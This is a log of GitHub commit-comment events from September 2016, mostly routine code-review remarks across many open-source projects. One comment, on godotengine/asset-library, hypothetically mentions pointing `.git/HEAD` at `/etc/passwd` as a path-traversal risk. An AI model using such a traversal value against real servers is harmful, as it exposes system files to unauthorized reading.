{"id":"4562830841","type":"CommitCommentEvent","actor":{"login":"erikrose"},"repo":{"name":"JaredKerim-Mozilla/fathom"},"payload":{"comment":{"id":19021439,"position":23,"line":267,"path":"utils.js","commit_id":"00d11be9d6cdac696a297bf2690254fa7002fd70","created_at":"2016-09-14T15:49:33Z","updated_at":"2016-09-14T15:49:33Z","body":"Were l or r `null`? Because if they were `undefined`, the `if (l === undefined || r === undefined) {` block just above should have caught them, and flow shouldn't have gotten here."}},"created_at":"2016-09-14T15:49:33Z"}
{"id":"4562831108","type":"CommitCommentEvent","actor":{"login":"LoneGazebo"},"repo":{"name":"LoneGazebo/Community-Patch-DLL"},"payload":{"comment":{"id":19021442,"position":null,"line":null,"path":null,"commit_id":"b99e5c1f5f1c91b227b62ba1ba4384a4aea9cc36","created_at":"2016-09-14T15:49:35Z","updated_at":"2016-09-14T15:49:35Z","body":"Perhaps yes. We need to do more test with @ilteroi to see if our results yesterday were actually real. "}},"created_at":"2016-09-14T15:49:35Z"}
{"id":"4562831151","type":"CommitCommentEvent","actor":{"login":"amueller"},"repo":{"name":"scikit-learn/scikit-learn"},"payload":{"comment":{"id":19021441,"position":null,"line":null,"path":null,"commit_id":"d9bd30e2f78dbae9ec131dee0c19f04061dc0ca8","created_at":"2016-09-14T15:49:35Z","updated_at":"2016-09-14T15:49:35Z","body":"sweet :)"}},"created_at":"2016-09-14T15:49:35Z"}
{"id":"4562832496","type":"CommitCommentEvent","actor":{"login":"mzweben"},"repo":{"name":"splicemachine/spliceengine"},"payload":{"comment":{"id":19021447,"position":null,"line":null,"path":null,"commit_id":"71597567ed05233fb8cb02aa3fec820e8813f38e","created_at":"2016-09-14T15:49:49Z","updated_at":"2016-09-14T15:49:49Z","body":"+1"}},"created_at":"2016-09-14T15:49:49Z"}
{"id":"4562835091","type":"CommitCommentEvent","actor":{"login":"flochtililoch"},"repo":{"name":"hypriot/blog"},"payload":{"comment":{"id":19021455,"position":330,"line":330,"path":"content/post/install-docker-on-chip-computer.md","commit_id":"85da315f1f87d77f413512895a7e728ca7b14f97","created_at":"2016-09-14T15:50:17Z","updated_at":"2016-09-14T15:50:17Z","body":"@DieterReuter \r\nIn order to run that step, I had to add my user to the `docker` group (my user isn't the default `chip` but I don't think that would matter, I have not see anything in your install scripts performing this change).\r\n\r\ni.e.\r\n```\r\nsudo usermod -aG docker $(whoami)\r\n```\r\n\r\notherwise, I would get the error described in [this SO post](http://stackoverflow.com/questions/21871479/docker-cant-connect-to-docker-daemon)\r\n"}},"created_at":"2016-09-14T15:50:17Z"}
{"id":"4562836153","type":"CommitCommentEvent","actor":{"login":"leodemoura"},"repo":{"name":"leanprover/lean"},"payload":{"comment":{"id":19021457,"position":11,"line":11,"path":"tests/lean/run/let3.lean","commit_id":"0b90ace9f8b284b7ef96d826a42842ac58dcadec","created_at":"2016-09-14T15:50:27Z","updated_at":"2016-09-14T15:50:27Z","body":"Clarification: in the alternative \r\n```\r\nobtain (a, b, c) := p1 \r\nin a + b + c\r\n```\r\nThe `:=` is replacing the `, from` in the original one, and the `in` is replacing the `, `.\r\n"}},"created_at":"2016-09-14T15:50:27Z"}
{"id":"4562836872","type":"CommitCommentEvent","actor":{"login":"atsepkov"},"repo":{"name":"atsepkov/RapydScript"},"payload":{"comment":{"id":19021460,"position":null,"line":null,"path":null,"commit_id":"de6ce95fa77d92320f8ea18cf1103561a06c68d1","created_at":"2016-09-14T15:50:33Z","updated_at":"2016-09-14T15:50:33Z","body":"But the scenario you describe is in fact a developer error that should be caught, at least from static-typing perspective. And while the language isn't static by default, I want to give developers additional power to enforce good code. I'm aware that annotations are comments in python, and unless they match a native type they're still a comment in RapydScript. However, the language isn't pure python and we've already diverged in some cases, even your own example of 5 + 'stars' is a TypeError in python. And in the end, one of the main reasons I prefer python over languages like perl and JavaScript is its ability to throw assertions early rather than letting errors snowball into unexpected behavior. I'm just trying to see if I can tackle the problem of early error detection from a different angle. TypeScript does similar-style hybrid typing.\r\n\r\nHowever, your concerns are valid, it may be a better idea for me to move the more aggressive type resolution (annotation-based) behind a compile flag."}},"created_at":"2016-09-14T15:50:33Z"}
{"id":"4562837131","type":"CommitCommentEvent","actor":{"login":"pfefferle"},"repo":{"name":"indieweb/wordpress-indieweb"},"payload":{"comment":{"id":19021462,"position":null,"line":null,"path":null,"commit_id":"fd13c3e8c16b5e2ef912dd87a8ff8760a1041d99","created_at":"2016-09-14T15:50:35Z","updated_at":"2016-09-14T15:50:35Z","body":"Why invert? the default is `true`!"}},"created_at":"2016-09-14T15:50:35Z"}
{"id":"4562837525","type":"CommitCommentEvent","actor":{"login":"lgauthier"},"repo":{"name":"metova/DataManager"},"payload":{"comment":{"id":19021464,"position":66,"line":253,"path":"Sources/DataManager.swift","commit_id":"9e5e3e8d98b781a14696ef6176b2904226fedc59","created_at":"2016-09-14T15:50:38Z","updated_at":"2016-09-14T15:50:38Z","body":"Now that you have this in here, the fetch line below isn't going to compile since the result is `[T]` already and it's trying to perform a conditional cast. You should be able to just directly return the results of the fetch inside the `do` block:\r\n\r\n```\r\nreturn try context.fetch(request)\r\n```"}},"created_at":"2016-09-14T15:50:38Z"}
{"id":"4562851552","type":"CommitCommentEvent","actor":{"login":"cyrilhamidechi"},"repo":{"name":"angular/angular"},"payload":{"comment":{"id":19021485,"position":5,"line":59,"path":"modules/@angular/http/src/headers.ts","commit_id":"7f647822bdddaad6a96c4f368a9874ce7ae3775c","created_at":"2016-09-14T15:52:49Z","updated_at":"2016-09-14T15:52:49Z","body":"Hi all,\r\n\r\nhttps://tools.ietf.org/html/rfc2616#page-31\r\n\"Field names are case-insensitive.\"\r\n\r\nAs far as I understand, this is a server-side concern, not client-side.\r\nServer has to be case-insensitive.\r\nThere is no statements saying that \"headers sent by the client should be lowercased\".\r\nThis is an amazing breaking change.\r\n\r\nOr maybe I've missed something?"}},"created_at":"2016-09-14T15:52:49Z"}
{"id":"4562852693","type":"CommitCommentEvent","actor":{"login":"JrtPec"},"repo":{"name":"Azure/azure-storage-python"},"payload":{"comment":{"id":19021489,"position":100,"line":126,"path":"azure/storage/queue/models.py","commit_id":"f98b9c4d0a438161eea5faeea0a5b69abac793dc","created_at":"2016-09-14T15:52:59Z","updated_at":"2016-09-14T15:52:59Z","body":"If you change 'str' to 'bytes', my IDE will stop complaining that I'm passing the wrong type ;-)"}},"created_at":"2016-09-14T15:52:59Z"}
{"id":"4562854504","type":"CommitCommentEvent","actor":{"login":"CoderGrowing"},"repo":{"name":"CoderGrowing/CoderGrowing.github.io"},"payload":{"comment":{"id":19021495,"position":null,"line":null,"path":null,"commit_id":"443aab4cf7d39f2de007ec437aed1e2dacbc720b","created_at":"2016-09-14T15:53:17Z","updated_at":"2016-09-14T15:53:17Z","body":"更改+1"}},"created_at":"2016-09-14T15:53:17Z"}
{"id":"4562855244","type":"CommitCommentEvent","actor":{"login":"dshanske"},"repo":{"name":"indieweb/wordpress-indieweb"},"payload":{"comment":{"id":19021496,"position":null,"line":null,"path":null,"commit_id":"fd13c3e8c16b5e2ef912dd87a8ff8760a1041d99","created_at":"2016-09-14T15:53:22Z","updated_at":"2016-09-14T15:53:22Z","body":"If it isn't defined at all, won't that throw a warning? If should use defined then. If !defined and not true."}},"created_at":"2016-09-14T15:53:22Z"}
{"id":"4562858438","type":"CommitCommentEvent","actor":{"login":"pfefferle"},"repo":{"name":"indieweb/wordpress-indieweb"},"payload":{"comment":{"id":19021500,"position":null,"line":null,"path":null,"commit_id":"fd13c3e8c16b5e2ef912dd87a8ff8760a1041d99","created_at":"2016-09-14T15:53:52Z","updated_at":"2016-09-14T15:53:52Z","body":"see https://github.com/indieweb/wordpress-indieweb/commit/fd13c3e8c16b5e2ef912dd87a8ff8760a1041d99#diff-6b1221428cfc964b7ed4aaac4b150d4eR16\r\n"}},"created_at":"2016-09-14T15:53:52Z"}
{"id":"4562859518","type":"CommitCommentEvent","actor":{"login":"brennan-collins"},"repo":{"name":"brennan-collins/flyway"},"payload":{"comment":{"id":19021504,"position":1,"line":1,"path":"flyway-sample-mongodb/README.md~","commit_id":"ef4e53a3f171fee97738d2555db8e5cda920cca8","created_at":"2016-09-14T15:54:02Z","updated_at":"2016-09-14T15:54:02Z","body":"Right, I was using emacs and forgot to add any files ending with the '~' to the .gitignore. I'll put that in there though, thanks for pointing it out."}},"created_at":"2016-09-14T15:54:02Z"}
{"id":"4562859863","type":"CommitCommentEvent","actor":{"login":"pfefferle"},"repo":{"name":"indieweb/wordpress-indieweb"},"payload":{"comment":{"id":19021505,"position":null,"line":null,"path":null,"commit_id":"fd13c3e8c16b5e2ef912dd87a8ff8760a1041d99","created_at":"2016-09-14T15:54:07Z","updated_at":"2016-09-14T15:54:07Z","body":"if not defined it defines it as true"}},"created_at":"2016-09-14T15:54:07Z"}
{"id":"4562860027","type":"CommitCommentEvent","actor":{"login":"kieranjol"},"repo":{"name":"AnjaMahler/IFIscripts"},"payload":{"comment":{"id":19021507,"position":null,"line":null,"path":null,"commit_id":"92bf2d5c54da369a215e7c8c7e9a90f0ae7826fe","created_at":"2016-09-14T15:54:08Z","updated_at":"2016-09-14T15:54:08Z","body":"Dunno, I think Anja cos she committed it to get account?\n\nOn 14 Sep 2016 4:19 p.m., \"ecodonohoe\" <notifications@github.com> wrote:\n\n> @kieranjol <https://github.com/kieranjol> Do I have to create this pull\n> request or @AnjaMahler <https://github.com/AnjaMahler> ?\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/AnjaMahler/IFIscripts/commit/92bf2d5c54da369a215e7c8c7e9a90f0ae7826fe#commitcomment-19020843>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ABEyvlIteeVBPpDL3BT31gidMXCwKESWks5qqBBrgaJpZM4J8fnx>\n> .\n>\n"}},"created_at":"2016-09-14T15:54:08Z"}
{"id":"4562860964","type":"CommitCommentEvent","actor":{"login":"bojidar-bg"},"repo":{"name":"godotengine/asset-library"},"payload":{"comment":{"id":19021508,"position":null,"line":null,"path":null,"commit_id":"7ab0afb3a8bf8bc2f93d2b4f9abf4c2d32b04228","created_at":"2016-09-14T15:54:18Z","updated_at":"2016-09-14T15:54:18Z","body":"Hope this doesn't backfire somehow... (like if we have `ref: /etc/passwd` in `.git/HEAD` :D)\r\n\r\nAlso, I can only hope PHP doesn't mess up the paths (though it won't be that bad, it would just not show anything)."}},"created_at":"2016-09-14T15:54:18Z"}
{"id":"4562863617","type":"CommitCommentEvent","actor":{"login":"aleperno"},"repo":{"name":"chinoogawa/fbht"},"payload":{"comment":{"id":19021512,"position":null,"line":null,"path":null,"commit_id":"95c8bd53f69fb97b7ec609b19a3237e86cb1fd38","created_at":"2016-09-14T15:54:41Z","updated_at":"2016-09-14T15:54:41Z","body":"Please report any issues in the issues section.\r\nFurthermore, remember the license of this project allows modifications. Feel free to fork this project and make any changes."}},"created_at":"2016-09-14T15:54:41Z"}
{"id":"4562865730","type":"CommitCommentEvent","actor":{"login":"ilteroi"},"repo":{"name":"LoneGazebo/Community-Patch-DLL"},"payload":{"comment":{"id":19021519,"position":null,"line":null,"path":null,"commit_id":"b99e5c1f5f1c91b227b62ba1ba4384a4aea9cc36","created_at":"2016-09-14T15:55:01Z","updated_at":"2016-09-14T15:55:01Z","body":"i can do a short test later tonight, around 10pm CEST, should be 4PM for you?"}},"created_at":"2016-09-14T15:55:01Z"}
{"id":"4562867538","type":"CommitCommentEvent","actor":{"login":"dshanske"},"repo":{"name":"indieweb/wordpress-indieweb"},"payload":{"comment":{"id":19021522,"position":null,"line":null,"path":null,"commit_id":"fd13c3e8c16b5e2ef912dd87a8ff8760a1041d99","created_at":"2016-09-14T15:55:19Z","updated_at":"2016-09-14T15:55:19Z","body":"Apologies, reading on my phone at work and it cut something off. Withdrawn."}},"created_at":"2016-09-14T15:55:19Z"}
{"id":"4562867925","type":"CommitCommentEvent","actor":{"login":"jrprice"},"repo":{"name":"jrprice/Oclgrind"},"payload":{"comment":{"id":19021524,"position":100,"line":2168,"path":"src/core/WorkItemBuiltins.cpp","commit_id":"0f6eb40ddb0c5c88a0b33ee885eec35e578f525d","created_at":"2016-09-14T15:55:22Z","updated_at":"2016-09-14T15:55:22Z","body":"Whoops! Reverted those changes.\r\n\r\nGood catch."}},"created_at":"2016-09-14T15:55:22Z"}
{"id":"4562869433","type":"CommitCommentEvent","actor":{"login":"Phatcat"},"repo":{"name":"Phatcat/mangos-wotlk"},"payload":{"comment":{"id":19021527,"position":17,"line":1388,"path":"src/game/AI/CreatureEventAI.cpp","commit_id":"e4928d20a0680a68d73c8e41417cd3d9e0234c80","created_at":"2016-09-14T15:55:35Z","updated_at":"2016-09-14T15:55:35Z","body":"I am however loving that idea, cyberium!"}},"created_at":"2016-09-14T15:55:35Z"}
{"id":"4562869936","type":"CommitCommentEvent","actor":{"login":"caffeinatedMike"},"repo":{"name":"caffeinatedMike/CC-Customization"},"payload":{"comment":{"id":19021530,"position":null,"line":null,"path":null,"commit_id":"d9c98031586d36cf7b8bfb8b99875f9874414394","created_at":"2016-09-14T15:55:39Z","updated_at":"2016-09-14T15:55:39Z","body":"Two notes:\r\n\r\n1. The related CSS has not been included with this file. Will add appropriate CSS file shortly.\r\n2. The pokemon-data section will most-likely be reverted yet again to use this (FastPokeMap) api in light of new features that the site admin is planning on implementing soon. \r\n\r\n> Future plan :\r\n> - **Display all known spawn and time until spawn, we have the most complete spawn database around the world with over 100M unique spawns recorded and about 110M timer offsets (bi-hourly spawns)**\r\n> - **200m scanning using known spawnpoints/offsets (Being worked on)**\r\n> - IV scanning (Using a trick I won't disclose here)\r\n> - The front-end will have a public github set up soon so people can pull request / tweaks to it.\r\n>\r\n>Source: [Reddit Thread](https://www.reddit.com/r/pokemongodev/comments/52q4y1/implementation_no_presentation_needed/?ref=share&ref_source=link)"}},"created_at":"2016-09-14T15:55:39Z"}
{"id":"4562870929","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19021531,"position":null,"line":null,"path":null,"commit_id":"4e047aa2b40e4ace2212e1e6e15c8f24beecf3bf","created_at":"2016-09-14T15:55:49Z","updated_at":"2016-09-14T15:55:49Z","body":"versionNumbers (mitchute) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-4e047aa2b40e4ace2212e1e6e15c8f24beecf3bf-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-14T15:55:49Z"}
{"id":"4562871608","type":"CommitCommentEvent","actor":{"login":"nickverse"},"repo":{"name":"CyanogenMod/android_frameworks_av"},"payload":{"comment":{"id":19021535,"position":null,"line":null,"path":null,"commit_id":"9b5caa8d9ee6cfd96793e9a60acc0448ab6be08a","created_at":"2016-09-14T15:55:54Z","updated_at":"2016-09-14T15:55:54Z","body":"@jwagantall Build error after this commit also! Any thoughts?\r\n![error2](https://cloud.githubusercontent.com/assets/17672938/18519445/a8f80db0-7aac-11e6-959b-45c832c364ae.png)\r\n"}},"created_at":"2016-09-14T15:55:54Z"}
{"id":"4562874395","type":"CommitCommentEvent","actor":{"login":"pfefferle"},"repo":{"name":"indieweb/wordpress-indieweb"},"payload":{"comment":{"id":19021543,"position":null,"line":null,"path":null,"commit_id":"fd13c3e8c16b5e2ef912dd87a8ff8760a1041d99","created_at":"2016-09-14T15:56:21Z","updated_at":"2016-09-14T15:56:21Z","body":"no problem :)"}},"created_at":"2016-09-14T15:56:21Z"}
{"id":"4562875103","type":"CommitCommentEvent","actor":{"login":"felixmulder"},"repo":{"name":"felixmulder/dotty"},"payload":{"comment":{"id":19021545,"position":null,"line":null,"path":null,"commit_id":"ccc4b1921ad1e3145258f3b3aa2ca2ac3262aabe","created_at":"2016-09-14T15:56:27Z","updated_at":"2016-09-14T15:56:27Z","body":"Hey @smarter - WDYT, could this be useful? Something like the rust explanations..."}},"created_at":"2016-09-14T15:56:27Z"}
{"id":"4562879453","type":"CommitCommentEvent","actor":{"login":"Coeur"},"repo":{"name":"ZipArchive/ZipArchive"},"payload":{"comment":{"id":19021555,"position":null,"line":null,"path":null,"commit_id":"81c8672414855e2de7265b792674d11940f8df23","created_at":"2016-09-14T15:57:01Z","updated_at":"2016-09-14T15:57:01Z","body":"yes, we're using SSZipArchive on a big private Swift 2.3 project without any issue."}},"created_at":"2016-09-14T15:57:01Z"}
{"id":"4562879555","type":"CommitCommentEvent","actor":{"login":"LoneGazebo"},"repo":{"name":"LoneGazebo/Community-Patch-DLL"},"payload":{"comment":{"id":19021556,"position":null,"line":null,"path":null,"commit_id":"b99e5c1f5f1c91b227b62ba1ba4384a4aea9cc36","created_at":"2016-09-14T15:57:03Z","updated_at":"2016-09-14T15:57:03Z","body":"I can do that! "}},"created_at":"2016-09-14T15:57:03Z"}
{"id":"4562887694","type":"CommitCommentEvent","actor":{"login":"dfcreative"},"repo":{"name":"danigb/audio-loader"},"payload":{"comment":{"id":19021578,"position":1,"line":1,"path":"dist/audio-loader.js","commit_id":"8abb7dfbbeb2d065278687559b32464fa7e28383","created_at":"2016-09-14T15:58:17Z","updated_at":"2016-09-14T15:58:17Z","body":"It is really not necessary to do bundling here, `audio-loader` is unlikely to be used standalone, at the same time it shares lots of dependencies."}},"created_at":"2016-09-14T15:58:17Z"}
{"id":"4562887879","type":"CommitCommentEvent","actor":{"login":"davezuko"},"repo":{"name":"davezuko/react-redux-starter-kit"},"payload":{"comment":{"id":19021579,"position":null,"line":null,"path":null,"commit_id":"4ecc655ae7c5db83e6c3edffd7456a667191bf2e","created_at":"2016-09-14T15:58:19Z","updated_at":"2016-09-14T15:58:19Z","body":"@tseho no roadmap just yet, but I'm trying to eliminate things that aren't 100% needed. `react-router-redux` is nice if it fits your use case, but it isn't at all necessary to use `react-router` and `redux`. This is part of an effort to greatly simplify how many dependencies are in this project."}},"created_at":"2016-09-14T15:58:19Z"}
{"id":"4562890239","type":"CommitCommentEvent","actor":{"login":"brennan-collins"},"repo":{"name":"brennan-collins/flyway"},"payload":{"comment":{"id":19021587,"position":13,"line":13,"path":"flyway-sample-mongodb/README.md","commit_id":"ef4e53a3f171fee97738d2555db8e5cda920cca8","created_at":"2016-09-14T15:58:40Z","updated_at":"2016-09-14T15:58:40Z","body":"Thank you, that works great. I get this error if I don't add the \"-P-InstallableTest -P-CommercialDBTest\" flags:\r\n[WARNING] Failure to transfer org.flywaydb:flyway-core:0-SNAPSHOT/maven-metadata.xml from s3://flyway-repo/release was cached in the local repository, resolution will not be reattempted until the update interval of flyway-repo has elapsed or updates are forced. Original error: Could not transfer metadata org.flywaydb:flyway-core:0-SNAPSHOT/maven-metadata.xml from/to flyway-repo (s3://flyway-repo/release): The S3 wagon needs AWS Access Key set as the username and AWS Secret Key set as the password. eg:\r\n<server>\r\n  <id>my.server</id>\r\n  <username>[AWS Access Key ID]</username>\r\n  <password>[AWS Secret Access Key]</password>\r\n</server>\r\n\r\nIs there an easy way to get around this?"}},"created_at":"2016-09-14T15:58:40Z"}
{"id":"4562890630","type":"CommitCommentEvent","actor":{"login":"Meuss"},"repo":{"name":"hypdeb/hypdeb"},"payload":{"comment":{"id":19021589,"position":null,"line":null,"path":null,"commit_id":"291194bed106f1ea1a043993db583539d14547af","created_at":"2016-09-14T15:58:43Z","updated_at":"2016-09-14T15:58:43Z","body":"sooo clean"}},"created_at":"2016-09-14T15:58:43Z"}
{"id":"4562891701","type":"CommitCommentEvent","actor":{"login":"dshanske"},"repo":{"name":"indieweb/wordpress-indieweb"},"payload":{"comment":{"id":19021591,"position":null,"line":null,"path":null,"commit_id":"fd13c3e8c16b5e2ef912dd87a8ff8760a1041d99","created_at":"2016-09-14T15:58:53Z","updated_at":"2016-09-14T15:58:53Z","body":"Sorry to be a pain about anything. I am, as always, very enthusiastic"}},"created_at":"2016-09-14T15:58:53Z"}
{"id":"4562891849","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"richelbilderbeek/nLTT"},"payload":{"comment":{"id":19021593,"position":null,"line":null,"path":null,"commit_id":"e9b0ce6101776c2384687d3fe990d89a1cfdf209","created_at":"2016-09-14T15:58:54Z","updated_at":"2016-09-14T15:58:54Z","body":"[R/ABC_SMC.R:108:31:](https://github.com/richelbilderbeek/nLTT/blob/e9b0ce6101776c2384687d3fe990d89a1cfdf209/R/ABC_SMC.R#L108) *style:* **Trailing whitespace is superfluous.**\n```r\n​abc_smc_nltt <- function(tree, \n                              ^\n```\n[R/ABC_SMC.R:109:37:](https://github.com/richelbilderbeek/nLTT/blob/e9b0ce6101776c2384687d3fe990d89a1cfdf209/R/ABC_SMC.R#L109) *style:* **Trailing whitespace is superfluous.**\n```r\n​                         statistics, \n                                    ^\n```\n[R/ABC_SMC.R:111:46:](https://github.com/richelbilderbeek/nLTT/blob/e9b0ce6101776c2384687d3fe990d89a1cfdf209/R/ABC_SMC.R#L111) *style:* **Trailing whitespace is superfluous.**\n```r\n​                         init_epsilon_values, \n                                             ^\n```\n[R/ABC_SMC.R:112:52:](https://github.com/richelbilderbeek/nLTT/blob/e9b0ce6101776c2384687d3fe990d89a1cfdf209/R/ABC_SMC.R#L112) *style:* **Trailing whitespace is superfluous.**\n```r\n​                         prior_generating_function, \n                                                   ^\n```\n[R/ABC_SMC.R:114:53:](https://github.com/richelbilderbeek/nLTT/blob/e9b0ce6101776c2384687d3fe990d89a1cfdf209/R/ABC_SMC.R#L114) *style:* **Trailing whitespace is superfluous.**\n```r\n​                         number_of_particles = 1000, \n                                                    ^\n```\n[R/ABC_SMC.R:115:39:](https://github.com/richelbilderbeek/nLTT/blob/e9b0ce6101776c2384687d3fe990d89a1cfdf209/R/ABC_SMC.R#L115) *style:* **Trailing whitespace is superfluous.**\n```r\n​                         sigma = 0.05, \n                                      ^\n```\n[R/ABC_SMC.R:126:5:](https://github.com/richelbilderbeek/nLTT/blob/e9b0ce6101776c2384687d3fe990d89a1cfdf209/R/ABC_SMC.R#L126) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(!inherits(statistics,\"list\")) {\n    ^\n```\n[R/ABC_SMC.R:126:27:](https://github.com/richelbilderbeek/nLTT/blob/e9b0ce6101776c2384687d3fe990d89a1cfdf209/R/ABC_SMC.R#L126) *style:* **Commas should always have a space after.**\n```r\n​  if(!inherits(statistics,\"list\")) {\n                          ^\n```\n[R/ABC_SMC.R:151:33:](https://github.com/richelbilderbeek/nLTT/blob/e9b0ce6101776c2384687d3fe990d89a1cfdf209/R/ABC_SMC.R#L151) *style:* **Commas should always have a space after.**\n```r\n​           \"but were instead: \",init_epsilon_values[j])\n                                ^\n```\n[R/ABC_SMC.R:241:77:](https://github.com/richelbilderbeek/nLTT/blob/e9b0ce6101776c2384687d3fe990d89a1cfdf209/R/ABC_SMC.R#L241) *style:* **Trailing whitespace is superfluous.**\n```r\n​                                                previous_params, parameters, \n                                                                            ^\n```\n[R/ABC_SMC.R:370:1:](https://github.com/richelbilderbeek/nLTT/blob/e9b0ce6101776c2384687d3fe990d89a1cfdf209/R/ABC_SMC.R#L370) *style:* **Trailing whitespace is superfluous.**\n```r\n​          \n^~~~~~~~~~\n```\n[tests/testthat/test_abc_smc_nltt.R:8:49:](https://github.com/richelbilderbeek/nLTT/blob/e9b0ce6101776c2384687d3fe990d89a1cfdf209/tests/testthat/test_abc_smc_nltt.R#L8) *style:* **Trailing whitespace is superfluous.**\n```r\n​                             lambda = params[1], \n                                                ^\n```\n[tests/testthat/test_abc_smc_nltt.R:26:23:](https://github.com/richelbilderbeek/nLTT/blob/e9b0ce6101776c2384687d3fe990d89a1cfdf209/tests/testthat/test_abc_smc_nltt.R#L26) *style:* **Commas should always have a space after.**\n```r\n​  obs <- treesim(c(20,0))\n                      ^\n```\n[tests/testthat/test_abc_smc_nltt.R:48:12:](https://github.com/richelbilderbeek/nLTT/blob/e9b0ce6101776c2384687d3fe990d89a1cfdf209/tests/testthat/test_abc_smc_nltt.R#L48) *style:* **Variable and function names should be all lowercase.**\n```r\n​    return(nLTTstat(tree1, obs, \"abs\"))\n           ^~~~~~~~\n```\n[tests/testthat/test_abc_smc_nltt.R:90:13:](https://github.com/richelbilderbeek/nLTT/blob/e9b0ce6101776c2384687d3fe990d89a1cfdf209/tests/testthat/test_abc_smc_nltt.R#L90) *style:* **Variable and function names should be all lowercase.**\n```r\n​    return( nLTTstat(tree1, obs, \"abs\"))\n            ^~~~~~~~\n```\n[tests/testthat/test_abc_smc_nltt.R:104:39:](https://github.com/richelbilderbeek/nLTT/blob/e9b0ce6101776c2384687d3fe990d89a1cfdf209/tests/testthat/test_abc_smc_nltt.R#L104) *style:* **Variable and function names should be all lowercase.**\n```r\n​    abc_smc_nltt(obs, c(statwrapper), treeSim, init_epsilon_values = -0.5,\n                                      ^~~~~~~\n```\n[tests/testthat/test_abc_smc_nltt.R:113:23:](https://github.com/richelbilderbeek/nLTT/blob/e9b0ce6101776c2384687d3fe990d89a1cfdf209/tests/testthat/test_abc_smc_nltt.R#L113) *style:* **Variable and function names should be all lowercase.**\n```r\n​    abc_smc_nltt(obs, statWrapper, treeSim, init_epsilon_values = -0.5,\n                      ^~~~~~~~~~~\n```\n[tests/testthat/test_abc_smc_nltt.R:113:36:](https://github.com/richelbilderbeek/nLTT/blob/e9b0ce6101776c2384687d3fe990d89a1cfdf209/tests/testthat/test_abc_smc_nltt.R#L113) *style:* **Variable and function names should be all lowercase.**\n```r\n​    abc_smc_nltt(obs, statWrapper, treeSim, init_epsilon_values = -0.5,\n                                   ^~~~~~~\n```\n[tests/testthat/test_abc_smc_nltt.R:120:1:](https://github.com/richelbilderbeek/nLTT/blob/e9b0ce6101776c2384687d3fe990d89a1cfdf209/tests/testthat/test_abc_smc_nltt.R#L120) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```"}},"created_at":"2016-09-14T15:58:54Z"}
{"id":"4562892031","type":"CommitCommentEvent","actor":{"login":"Meuss"},"repo":{"name":"hypdeb/hypdeb"},"payload":{"comment":{"id":19021597,"position":null,"line":null,"path":null,"commit_id":"291194bed106f1ea1a043993db583539d14547af","created_at":"2016-09-14T15:58:56Z","updated_at":"2016-09-14T15:58:56Z","body":"Mister Propre"}},"created_at":"2016-09-14T15:58:56Z"}
{"id":"4562894218","type":"CommitCommentEvent","actor":{"login":"huei-tan-sociomantic"},"repo":{"name":"damian-rodriguez-sociomantic/flounder"},"payload":{"comment":{"id":19021601,"position":15,"line":25,"path":"src/core/flounder.js","commit_id":"7365bdb1f827e80791e3d2ece5e92d842b14fdef","created_at":"2016-09-14T15:59:18Z","updated_at":"2016-09-14T15:59:18Z","body":"Why this is hard code here? Do we have anything options/configurations to update it?"}},"created_at":"2016-09-14T15:59:18Z"}
{"id":"4562896625","type":"CommitCommentEvent","actor":{"login":"waxxfetish"},"repo":{"name":"azablock/DarklandECS"},"payload":{"comment":{"id":19021605,"position":10,"line":0,"path":"src/main/java/dl/Behavior/Behavior.java","commit_id":"54d477d3630c4f39f0c81f331e62563d6d95ec6a","created_at":"2016-09-14T15:59:36Z","updated_at":"2016-09-14T15:59:36Z","body":"czemu nie interface z default methodem"}},"created_at":"2016-09-14T15:59:36Z"}
{"id":"4562897637","type":"CommitCommentEvent","actor":{"login":"kbenne"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19021609,"position":4,"line":336,"path":"openstudiocore/src/utilities/CMakeLists.txt","commit_id":"0e6d0249556fae9afef428dc1c0822388c29d780","created_at":"2016-09-14T15:59:46Z","updated_at":"2016-09-14T15:59:46Z","body":"interesting. Yeah you have made me aware of the portability issues. I'm pretty comfortable building swig. but I'm not so sure about external project here. Maybe just build it with a custom command and predict the location where the binary will end up. "}},"created_at":"2016-09-14T15:59:46Z"}
{"id":"4562899344","type":"CommitCommentEvent","actor":{"login":"dfcreative"},"repo":{"name":"danigb/audio-loader"},"payload":{"comment":{"id":19021612,"position":5,"line":5,"path":"lib/load.js","commit_id":"8abb7dfbbeb2d065278687559b32464fa7e28383","created_at":"2016-09-14T16:00:01Z","updated_at":"2016-09-14T16:00:01Z","body":"Why so?"}},"created_at":"2016-09-14T16:00:01Z"}
{"id":"4562899999","type":"CommitCommentEvent","actor":{"login":"maurofmferrao"},"repo":{"name":"maurofmferrao/xibo-cms"},"payload":{"comment":{"id":19021613,"position":null,"line":null,"path":null,"commit_id":"b49f0fa0b7273da9acc3e083f3e02fea1a582065","created_at":"2016-09-14T16:00:09Z","updated_at":"2016-09-14T16:00:09Z","body":"The XiboFormRender was changed so it receives the calling object instead of its link, so we can disable the button link until the Ajax response is received, avoiding multiple calls and multiple forms opening at the same time."}},"created_at":"2016-09-14T16:00:09Z"}
{"id":"4562903748","type":"CommitCommentEvent","actor":{"login":"josephwb"},"repo":{"name":"OpenTreeOfLife/reference-taxonomy"},"payload":{"comment":{"id":19021622,"position":null,"line":null,"path":null,"commit_id":"a95f2ed04b1bd4eda7a7a424f70cbc2c0647669a","created_at":"2016-09-14T16:00:42Z","updated_at":"2016-09-14T16:00:42Z","body":"NOTE: not positive this is the correct version of skoapi.jar. This is v2, @jar398 mentioned v3 on gitter."}},"created_at":"2016-09-14T16:00:42Z"}
